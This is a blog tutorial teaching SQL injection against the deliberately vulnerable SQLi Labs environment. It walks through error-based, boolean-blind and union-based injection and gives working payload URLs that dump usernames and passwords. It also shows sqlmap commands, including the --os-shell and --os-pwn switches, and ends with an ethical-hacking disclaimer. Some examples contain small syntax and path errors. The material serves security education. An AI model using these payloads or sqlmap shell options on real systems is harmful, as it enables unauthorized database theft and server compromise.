Learn to perform SQLi attacks

 

 

 

 

SQL Injection

Learn to perform SQLi attacks in the most effective way!

 

Introduction & Mindset


Hello there!

In this lecture, we are going to explore manual and automatic ways to achieve SQL Injection (SQLi).

 

 

Picture credit: geekflare.com

 

 

 

Nowadays, SQLi attacks have become rarer due to rising awareness towards them. Happily, this does not change the fact that there are still a lot of vulnerable web apps that can be exploited using SQLi.

For practice, you'll need your own Kali Linux machine with default toolset. Burpsuite and sqlmap are mandatory.
(It's better for you to be familiar with these beforehand)


I'll try to make theory as detailed as possible, but I would still encourage you to do research on your own and read more upon completing the following tasks. This way you are more likely to understand all the material and will be successful with continuing on your own ;)

Unit 2 - Basics of SQL language

Important definitions

As seen from Wikipedia,


"A database is an organized collection of data, generally stored and accessed electronically from a computer system." There a lot of different database types such as MySQL, PostgreSQL, and so on.

SQL by itself is a domain-specific language used in programming for managing databases by reading operating data.

SQL Crash Course

In order to understand SQLi, we first need to understand some basics of the SQL language. As far, as SQLi goes, we mainly focus on getting information from the database, this room will give you a basis for that.

In SQL, in order to choose some data, we use SELECT, FROM, and WHERE. As you might have guessed SELECT allows us to select an object from (FROM) database and choose a specific data using WHERE.



For example, if we have a database called colors and we want to select all colors from the list, we would use this syntax::



SELECT * FROM colors;



Or if you have a database food with different meals followed by calories you could choose all meals with more than 50 calories:



SELECT * FROM food WHERE calories > 50;


All in all, if you want a better understanding of SQL I would recommend going through this small interactive course on khanacademy.






 

Unit 3 - What is SQLi

A SQL injection attack consists of the injection of a SQL query to the remote web application.

A successful SQL injection exploit can read sensitive data from the database (usernames & passwords), modify database data (Add/Delete), execute administration operations on the database (such as shutdown the database), and in some cases execute commands on the operating system.


SQLi injections put server confidentiality under serious risk and can allow bypassing authentication processes or even get access to high-privilege accounts.


Let’s take a look at this simple PHP input function:

 

 

 

If we look at the $username variable, under normal operation we might expect the username parameter to be a real username. The function takes a username and chooses data related to it in the users database.


A malicious user (hacker or pentester) might submit some different kinds of data. For example, what happened if we input '? (Single quote)

The application would crash because the resulting SQL query is incorrect.

 

As you see here, inputted " ' " simply creates triple " ' " and produces an error. This error can in fact output some sensitive information or simply give a clue about database structure.

This will produce a different scenario. 1=1 is treated as true in SQL language and therefore will return us every single row in the table.


'-- will also do a job here. This payload transforms a username to an empty string to break out of the query and then adds a comment (--) that hides the second single quote making the database return data. We will discuss this more in-depth in Unit 5.

Unit 4 - How to detect SQLi?

Manual - PHP parameter

As we saw in the previous unit, SQL injection is carried out by entering a malicious input to hijack an SQL query. The most common example is abusing a PHP GET parameter (for example $username, or $id) in the URL of a vulnerable web page. Those are usually located in the search fields and login pages, so as a penetration tester, you need to note those down.


So, now after you got all the PHP GET parameters and login pages you can actually proceed to detecting SQLi. Similarly to the previous unit, we want to cause a certain error displaying at least a small error message (which can even disclose some information, like a database type).


Let's try that by using SQLi Labs.

so, as you can see that...browse to hackingtruth.lab/sqli-labs/Less-1/

 

 

As a hint, it's asking us to "Input the ID as parameter with numeric value" (exactly the PHP GET parameter we are looking for).

hackingtruth.lab/sqli-labs/Less-1/index.php?id=1



Giving 1 as id value outputs a standard username and password, but that's not something we are looking for. Let's input apostrophe instead of 1.


hackingtruth.lab/sqli-labs/Less-1/index.php?id='

 

 

 

 

Vola! We were able to create an error, therefore, exposing that the id parameter is vulnerable to SQLi! We also were able to see that the error message exposed the database type - MySQL. 

 

 

Fixing the Query

 

We need to now fix our query so that we can get rid of the error and pass our malicious SQL query to the database this is done one of two ways, either we comment out the rest of the query or we add some extra characters to the unbalanced query to balance it out.


In our example, we are going to comment out the rest of the query this can be done using any of these values…



-- Double Dash
 # Hash
 /*  */ Forward Slash, Star,Star, Forward Slash
 
 

because we are not directly interacting with the database and instead we are interacting with the web front end and that front end is actually creating the query to interact with the backend so there are some constraints.

one of the constraints is that when we use — (double dash) to comment out the rest of the query we need to provide an extra space after the double dash. If you don’t it will not fix the query.

So if we go back to our SQL labs lesson 1 and just add — to the end of our query you will see that we still get an error.


http://hackingtruth.lab/sqli/Less-1/?id=1'--




This shows that the comments have not worked as intended, due to not having the space at the end of the double dash also you will get the same error if you actually do a space after the double dash because we are entering it in the URL address bar and you cant have spaces at the end of an address. To get around this you have to URL encode the space for it to work, this for space is %20 try this on your query and you will notice this is now fixed.



http://hackingtruth.lab/sqli/Less-1/?id=1'--%20






The same goes for the # (Hash) this will not work until you URL encode the hash and add it to the end of your query. The #(Hash) URL encoded is %23 and this will give you the same output as above.

http://hackingtruth.lab/sqli/Less-1/?id=1'%23


So basically all we are doing is commenting out anything after the single quote which closes the string then, in turn, allows us to enter SQL commands which SQL will then run against the database.


'  '1' -- ' LIMIT 0,1'


Just to recap any of the values below can be used to comment out and fix your query.


-- Double Dash is URL encoded as --%20
--+ Injection This is the same as above but the + on the end just means a space.
# Hash is URL encoded as %23
-- - Double Dash space Dash SQL comment
;%00 Nullbyte
` Backtick

Find the Number of Columns

Now we have broken the query and fixed it we are now ready to find out how many columns the Backend database has, This is done by using the order by statement and incrementing the number until you get an error. Start by adding order by 1 to the query as below.


http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 1–+


Keep incrementing the number after the order by statement until you get an error


http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 2–+ ( no error)
http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 3–+ (no error)
http://hackingtruth.lab/sqli/Less-1/?id=1′ order by 4–+ (error)

Find which Columns are Vulnerable

To find which columns are vulnerable, we have to use a union all select statement with the number of columns we found in the previous section.



http://hackingtruth.lab/sqli/Less-1/?id=1' union all select 1,2,3--+



Notice nothing really changes on our test lab as we need to make the statement false to find the vulnerable columns, to do this we have to write something after the = sign which is not in our database

http://hackingtruth.lab/sqli/Less-1/?id=–1′ union all select 1,2,3–+

http://hackingtruth.lab/sqli/Less-1/?id=.1' union all select 1,2,3--+
http://hackingtruth.lab/sqli/Less-1/?id=hempstutorials1' union all select 1,2,3--+
http://hackingtruth.lab/sqli/Less-1/?id=-lol-1' union all select 1,2,3--+


As you can see you can write anything after the = sign to get the same result as long as it’s not in the database.

Let’s just make sure these columns are vulnerable by adding some extra characters this shows that we are able to manipulate what these columns display.



http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,222,333--+

Find SQL Version & Database Name

We can now use our vulnerable columns to find out some juicy information like which Version of SQL the server is running and the name of the database

To find out the SQL version, we just need to add version() to one of the vulnerable columns like this…


http://hackingtruth.lab/sqli/Less-1/?id=-lol-1′ union all select 1,version(),333–+





This tells us we are running SQL 5.7.15 and Ubuntu 0.16.04.1 which, if you followed my tutorial on setting up a vulnerable LAMP server we know in my SQL Labs that I have installed Linux Mint which is based on ubuntu.

The reason we need to know the version of SQL is that SQL version 4 is very different in the way you do SQL Injections compared to SQL Version 5.  In SQL version 4 you have to guess the table names compared to Version 5 where you manipulate the INFORMATION_SCHEMA to spit out the names of the tables.

Next to find out the name of the database add database() to the either of the two columns.




http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,version(),database()--+

As you can see, I have used column 3 which now displays the name of the database as security.

Finding Tables

Now its time to display what tables are in our database called Security. We do this by adding a group_concat command in one of the vulnerable columns that query’s the information _schema and spits out the table names on the website.



http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 

 

 

 

After you get the names of the tables, it’s time to start extracting the data from these tables. In this example, we will go after the users table as this is where you usually find all the juicy usernames and passwords.



 

Extract the columns

We extract the columns by adding column_name in between the brackets of our group_concat command and changing the information_schema to look at the columns.


http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+

 

 

 

 

 

 

 

Dumping Columns

Now we select what columns we want to dump from our table. For this example, I’m looking for the id, username and password  columns from the users table. To do this we add id,username,password inside the brackets of our group_concat command, then tell it which table we want to dump the data from.


http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,username,password),3 from users--+

 

 

 

So this displays all the usernames and passwords from the users table, the problem is this is not very easy to read.

 

Formatting the Output

We can make this more pleasing to read by adding HEX encoded characters and HTML tags to our query.

The easiest way to do this is by using the HEX Encoding function in the Hackbar firefox addon.

So say we want to add  colons : between our id, username and password. First open up the Hackbar (F9 if you have it installed but it is not showing) type a : (colon) into the hackbar, highlight it and select

Encoding -->HEX Encoding --> String to 00ff00ff

 

 

 

 
This will convert the colon : into a 3a, then add 0x to the front of this and it now can be added to our query like below… Which will add a colon between each username and password it displays .

 

http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,username,0x3a,password),3 from users--+


Also try adding a double colon :: after the id in our query. A double colon encodes to 3a3a using the Hackbar, add 0x to the front of that and we get 0x3a3a which we can add after id



http://hackingtruth.lab/sqli/Less-1/?id=-1' union all select 1,group_concat(id,0x3a3a,username,0x3a,password),3 from users--+

 

 

 

 




0x3a = :
0x3a3a= ::

you can also encode HTML tags to format the text, in this example I will use a line break <br> to list the output with one line for each record.

<br> HTML tag encodes with the hackbar to 3c62723e add 0x to  the front of this to get 0x3c62723e and add it before the id in our query.




http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=' union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),3 from users--+

 

<br> = 0x3c62723e  (a line break)

You can even encode a string using this same process for example HempsTutorials encodes to 48656d70735475746f7269616c7320 add 0x to the front of this and add 0x48656d70735475746f7269616c7320 to the other vulnerable column we are not using. which once processed will display HempsTutorials in our output.





http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=-1' union all select 1,group_concat(0x3c62723e,id,0x3a3a,username,0x3a,password),

0x48656d70735475746f7269616c7320 from users--+

Automatic - Damn Small SQLi Scanner

Github: https://github.com/stamparm/DSSS

Quick install: git clone https://github.com/stamparm/DSSS.git && cd DSSS/


Damn Small SQLi Scanner is an awesome little python script that allows us to check for SQLi vulnerability. Simply provide it with a link to the PHP parameter to run it.

Main syntax: python3 dsss.py -u "LINK"


Let's try it on our SQLi labs!

Simply run the script against hackingtruth.lab/sqli-labs/Less-1/index.php?id= and see what happens.

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab]
└─$ git clone https://github.com/stamparm/DSSS.git && cd DSSS/
Cloning into 'DSSS'...
remote: Enumerating objects: 366, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 366 (delta 2), reused 8 (delta 2), pack-reused 357
Receiving objects: 100% (366/366), 66.01 KiB | 472.00 KiB/s, done.
Resolving deltas: 100% (120/120), done.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
└─$ 

 

 

 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
└─$ python3 dsss.py -u "http://hackingtruth.lab/sqli-labs/Less-1/index.php?id="                                                 130 ⨯
Damn Small SQLi Scanner (DSSS) < 100 LoC (Lines of Code) #v0.3b
 by: Miroslav Stampar (@stamparm)

* scanning GET parameter 'id'
 (i) GET parameter 'id' appears to be error SQLi vulnerable (MySQL)
 (i) GET parameter 'id' appears to be blind SQLi vulnerable (e.g.: 'http://hackingtruth.lab/sqli-labs/Less-1/index.php?id=1%27%20AND%2070%3D70--%20-')

scan results: possible vulnerabilities found
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/hackingtruth.lab/DSSS]
└─$ 

 

 

 

Oh wow! It did not only detect the vulnerability but provided us with the database type and suggested possible exploitation types.
That is definitely a good tool and I highly recommend using it!




Automatic - suIP.biz

Link: https://suip.biz/?act=sqlmap



This is an online sqlmap powered tool that allows you to perform a fast SQLi check. Unfortunately, we cannot run it against our machine but this tool can be really handy in the real-world tests

Note: If really want to test this (or some other SQLi tools) with SQLi labs, it is possible to host the labs on Heroku or any other server provider (find an installation link in Unit 9).

 

Unit 5 - Error Based SQLi

Definition

Error-based SQLi is a SQL Injection technique that relies on error messages which are used to retrieve any sensitive information. In some cases, error-based SQL injection alone is enough for an attacker to enumerate an entire database.



Approach

So, as seen from the definition, we actually want to create a SQL error, displaying some sensitive content. As you might have seen in Unit 4, we were able to get the database type by creating an error. Now we need to go beyond that and get something more interesting.

Of course, to make your life easier, at this point you would actually fuzz the SQL vulnerable link with a wordlist and most likely get the desired result. But for the purpose of this room, we are going to actually see how manually develop the payload using the understanding of SQL language. I have linked some useful payload lists and blogs in Unit 9 so you can practice fuzzing.


Manual exploitation - SQLi Labs Lesson 1


Browse to lesson 1 on the sqli labs machine and include the id=1 parameter just like we did in the previous unit.


 

 

 

When we put the id parameter as some value, we instantly get a Login name and password. Let's think of that in terms of SQL language.

This id parameter is attached to a certain username (login name) and password which are being chosen from the database.



This how it would look in terms of SQL language:

select login_name, password from table where id=



See, just by looking at the basic output, we were able to retrieve some common SQL patterns. Now, as a part of error-based SQLi, we can exploit it.



Note here: Try inputting something other than numbers and see what happens. Also, try inputting some big numbers. Think about it and ask yourself if it tells us about anything.

Now try inputting 1' as the id parameter and let's analyze the error closely.



syntax to use near ''1'' LIMIT 0,1' at line 1

We can see that the web app is producing an error due to four single quotes around the 1

As in Unit 3, we can understand that error as 'one extra' single quote which cannot be recognized by the system.




What do I mean by that? Well, in this case when the application is taking the id input, it is putting it between two single quotes like so:

' 1 '


But when we input 1' we produce this scenario:

' 1' '

We are, in a way, closing the first single quote, at the same time creating the third. This, later on, makes the system automatically close the third one, displaying syntax to use near ''1''error.

If you are still a bit confused about this, let's take a bit different approach.
Try inputting 1\ as the id value. This also produces an error with '1\', clearly showing that the id value is placed between single quotes.

What we can do about it?
Well, if we can close the single quotes that easily, it means that we are able to break out of the query and provide custom commands.

If you try putting AND 1=1 (which corresponds to true) after the single quote, we still get this error.
 

In order to get around that, we need to fix the query back. It's done by commenting out the rest by using -- and providing + as the blank space at the end.
The URI should look like this


hackingtruth.lab/sqli-labs/Less-1/index.php?id=1' AND 1=1 --+

 

 

 

 

 

Wonderful! The web application is displaying us content even though we injected some custom SQL code which should not be available for us.

 

 

 

 

 

So, to sum up, in error-based SQLi injection, we first, need to find a link or input form where we can create an error. Then, by inputting random things like single and double quotes, slashes, and backslashes we need to understand the common pattern and figure out the basic structure of SQL query. After that simply abuse your acquired knowledge to exploit the app and get what you wanted.

A small payload collection can be found here:

https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads

 
 

 

Unit 6 - Boolean based SQLi

Definition


Boolean-based SQL Injection relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query gave a TRUE or FALSE result. Depending on the result, the content of the HTTP response will change, or remain the same (Change in HTTP response usually stands for a FALSE response, while TRUE does not affect anything). This allows an attacker to understand if the payload used returned true or false, even though no data from the database is returned.




Approach


The boolean based sqli is usually carried out in a blind situation. Blind, in this case, means that there's no actual output and that we cannot see any error message (like we did previously).



Blind query breaking - SQLi Labs Lesson 8



Browse to 10.10.13.253/sqli-labs/Less-8/?id= and let's take a look.
Inputting single or a double quote doesn't produce any result, same as slashes. This gives us the idea of the blindness of our sql injection (or even absence of vulnerability at all). In this situation, we'll have to practically guess the query and exploit the database right away.



Make the id parameter equal to 1. We now see a message:
You are in...........



Now, let's blindly assume that the same as in the previous unit, putting 1' as the id value would produce some error.


hackingtruth.lab/sqli-labs/Less-8/?id=1'


And it did! We didn't see the error message but the message disappeared meaning that we were actually able to produce some sort of error. Now, fix the query by putting --+


hackingtruth.lab/sqli-labs/Less-8/?id=1' --+


Wonderful! The message is back. See what happened here, even though we are not able to see any SQL output, by making some simple assumption we were able to find a similar pattern as in the previous unit.


But the difference is that boolean sqli relies on the concept of True-False relation. Let's see how it works here. 

Put OR 1 in the link like so: 10.10.13.253/sqli-labs/Less-8/?id=1' OR 1 --+, representing the True value. 

We still see the message.

Putting OR 0 won't logically display the message directly proving our ability to perform an SQL injection attack

Exploitation

Well, now as we can only return True (You are in...........) or False (no message) statements, we need to start playing the game of yes-no with the database. By asking 'questions' about the database length and table quantity we can dump and enumerate the database.


At this point, it is important to understand that in SQL language we can actually use =, <, > to compare the values.

Try putting different comparison values in your link


hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 < 2 --+ = True


or


hackingtruth.lab/sqli-labs/Less-8/?id=1' OR 1 > 2 --+ = False

This comparison can be actually helpful for us in asking those 'questions'.



For this particular room let's try to get the database's name using blind sql injection.


In sql language, there's a really useful function called SUBSTR() which extracts a substring from a string (starting at any position).
It takes 3 input values:
1. Operated text (in our case database name)
2. Character to start with
3. Number of characters to extract



For example, running SELECT SUBSTR("Strange Fox", 5, 3) will return us nge.




Then, our SQLi payload would look like that:


AND (substr((select database()),1,1)) - this will return us the first character of the database name.



Now, what we need to do is literally guess the character by trying to compare that payload to some letters.
Theoretically, the payload would look like that



1' substr((select database()),1,1)) = s --+



Happily for us, there's a way to avoid using characters and actually speed things up (instead of fuzzing the whole alphabet). If we add ascii() function before the payload, we'll be able to compare it to ascii character values.


hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+



This will once again return us You are in........... because s letter corresponds to 115 in ASCII.


Of course, in the real world we cannot simply guess that so we need to use > and < operators to compare the value of the characters to their ASCII values.



Now try guessing the second letter using the comparison technique.




Hint:

hackingtruth.lab/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+

 

 

Provided by COMPARITECH

 

Unit 7 - Union Based SQLi

Definition

Union-based SQLi is a SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.


Approach

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:


SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwords


This SQL query will return a single result taken from 2 columns: first and second positions from usernames and passwords.


UNION SQLi attack consists of 3 stages:

1. You need to determine the number of columns you can retrieve.
2. You make sure that the columns you found are in a suitable format
3. Attack and get some interesting data.

> Determining the number of columns required in an SQL injection UNION attack

There are exactly two ways to detect one:

The first one involves injecting a series of ORDER BY queries until an error occurs. For example:


' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# and so on until an error occurs



(The last value before the error would indicate the number of columns.)



The second one (most effective in my opinion), would involve submitting a series of UNION SELECT payloads with a number of NULL values:


' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs



No error = number of NULL matches the number of columns.


> Finding columns with a useful data type in an SQL injection UNION attack


Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, (for example 4) you can probe each column to test whether it can hold string data by replacing one of the UNION SELECT payloads with a string value. In case of 4 you would submit:



' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--



 

No error = data type is useful for us (string).

> Using an SQL injection UNION attack to retrieve interesting data

When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.


Suppose that:

* The first two steps showed exactly two existing columns with the useful datatype.
* The database contains a table called users with the columns username and password.
    (This can be figured out by using the boolean technique from Unit 6)


In this situation, you can retrieve the contents of the user's table by submitting the input:



' UNION SELECT username, password FROM users --


 

First, i browse to hackintruth.lab:3000/resetdb.php to set up the database.
 
 
Then, go to hackingtruth.lab:3000/register.php and register a new account. Make sure you input something interesting, as you'll be able to interact with that data later on! (Question 4)


Now let's proceed to the main objective - exploiting the web app. A vulnerable search field is located at
 
hackingtruth.lab:3000/searchproducts.php

Let's start our exploitation process!

As you might remember, we, first, need to determine the number of available columns by inputting a series of
' UNION SELECT NULL -- into the search field.


To spice things up, I've configured the database to also throw an error when having a -- at the end. To bypass that, we need to include an additional comment after the --. You can use either // or /* do bypass that configuration.


 

 

 

 

 

As you can see on the screenshot above, a single NULL value causes an error, meaning that there are more columns. Try inputting NULL values until you finally get the number. Note it down to answer the questions later on.

Now, try inputting 'a' instead of random NULL values and see if there's an error. An error will indicate that the given column format is not suitable for us and cannot be exploited.

NULL,NULL,NULL,'a' -- //

 

 

 


Finally, we can start getting some valuable information. Simply replace some null values with SQL keywords to get information about the database.
Here's a small list of thing you'd want to retrieve:
1. database()
2. user()
3. @@version
4. username
5. password
6. table_name
7. column_name

Let's try this

1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -

 

 

 

 

' UNION SELECT * FROM users -- //

 

 

 

 

 

Now, next step is to extract some more information from the database, and Union query is a great way of doing that.

I supply, whoiskumaratul' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


which gives me no. of exact columns. As we can see, the no. of NULLs above is 8 so the table has 8 nos of columns. Anything less than 8 don't produce any error and anything above than 8 produces error. So, that way we can determine that the no. of columns are 8. Another way of doing that is executing  ' ORDER BY query.

Start by 'ORDER BY 1 till you get error and the no. before you get error is no. of the columns. So, supplying 'ORDER BY 9 gave error, so the no. is 8.

 

 

 

 

 


Next step is to know the datatype of the columns. The query

' UNION SELECT 'a',NULL,NULL,NULL,NULL,NULL,NULL,NULL--  


which gives me error as 'conversion failed....data type int' so the first column is int. Similarly we can keep trying to replace each NULL in above query to know the datatypes of each column. Another example,


' UNION SELECT NULL,'a',NULL,NULL,NULL,NULL,NULL,NULL--  


doesn't produce any error, so string datatype, so- forth, so-on.



Now more queries can be executed:


' UNION SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

 

' UNION SELECT database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

 

' UNION SELECT user(),NULL,NULL,NULL,NULL,NULL,NULL,NULL--                /*version info*/

 

' union select null, id, username, password, fname from users -- //

 

 

 

 

 

Automating exploitation

SQLmap

Project link: http://sqlmap.org/
Github: https://github.com/sqlmapproject/sqlmap


sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


sqlmap is truly an awesome tool that can be extremely handy for us. Even though it is not allowed to use it during the OSCP exam, nothing restricts us from using it for our pen-tests and tryhackme rooms.


Quick install:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Print out the help page by running sqlmap --help and can take a closer look.

 

Pure sqlmap

Table of the most important switches

 

 

 

 

Settings	Enumeration	OS interaction	Additional
--url (-u) Set the target URL	--dump --dump-all Dump (retrieve) DBMS database	--os-shell Prompt for an interactive operating system shell	--batch Never ask for user input, use the default behavior
--dbms Provide back-end DBMS to exploit (i.e MySQL, PostgreSQL)	--passwords Enumerate DBMS users password hashes	--os-pwn Prompt for an OOB shell, Meterpreter or VNC	--wizard Simple wizard interface for beginner users
--level=LEVEL Level of tests to perform (1-5) --risk=RISK Risk of tests to perform (1-3)	--all Retrieve everything

 

 

 

 

 

 
Command examples:

https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet


All-in-one cheat sheet:

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/



Now, when we are a bit more familiar with sqlmap let's practice using it.
Go back to sqli labs lesson 1 and input the link to sqlmap.

sqlmap --url "hackingtruth.lab/sqli-labs/Less-1/index.php?id=" --batch

 

Oh wow! sqlmap has fetched all information for us! DB type, possible injection type, and even got us OS information.

Now go ahead and play around with the tool, try dumping the database, or simply enumerating it.



Burpsuite + sqlmap


sqlmap has a really awesome feature that allows us to automatically process and exploit requests taken from Burpsuite.

Go ahead and configure burp suite to work properly. (If you are not sure how to use Burpsuite, take a step back and see this article )

 

 

 

 

 

HERE - CLICK HERE

 

 

 

 


Check that you have caught a request similar to the screenshot above.
Right-click on the request and choose 'Save item'. Now when we have a saved request let's go ahead and connect sqlmap here.


Go to the request location (where you saved it) and open up a terminal.

type sqlmap -r {request} --batch (replace {request} with your file name).

 

 

 
We got the same output as before! See how easy it actually was.
As a piece of advice, I'd definitely use the request feature when SQL injecting login pages as sqlmap automatically check all possible parameters (username, password).



1) How would you get an OS shell on website "hackingtruth.lab/login.php"? (URL switch comes first)

Ans :- sqlmap -u "sqli.thm/login.php" --os-shell




2) What about listing all databases on the same website? (URL switch comes first)

Ans :- sqlmap -u "sqli.thm/login.php" --dbs


 

 

https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet


All-in-one cheat sheet:

 
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

 

Unit 9 - Resources & What's next?

Congratulations! we have successfully gone through the major part of SQLi. Now, with all that knowledge it won't take long for you to pick up on small tricks and tactics by reading and researching more. I have attached a some further SQLi resources for you to explore. Enjoy!

Good luck with your studies!


 

Payload Lists:

1. https://github.com/payloadbox/sql-injection-payload-list
2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection



 

 

Guides & Blogs:

1. https://www.sqlinjection.net/
2. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
3. https://github.com/trietptm/SQL-Injection-Payloads
4. https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet
5. https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
(Special thanks to TheMayor for linking the last one)


 

 

Labs and practice:

1. https://portswigger.net/web-security/sql-injection
2. https://github.com/Audi-1/sqli-labs
3. https://github.com/appsecco/sqlinjection-training-app
4. https://tryhackme.com/room/gamezone
5. https://tryhackme.com/room/avengers
6. https://tryhackme.com/room/uopeasy
7. https://tryhackme.com/room/jurassicpark

 

Disclaimer

 

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



- Hacking Truth by Kumar Atul Jaiswal



I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)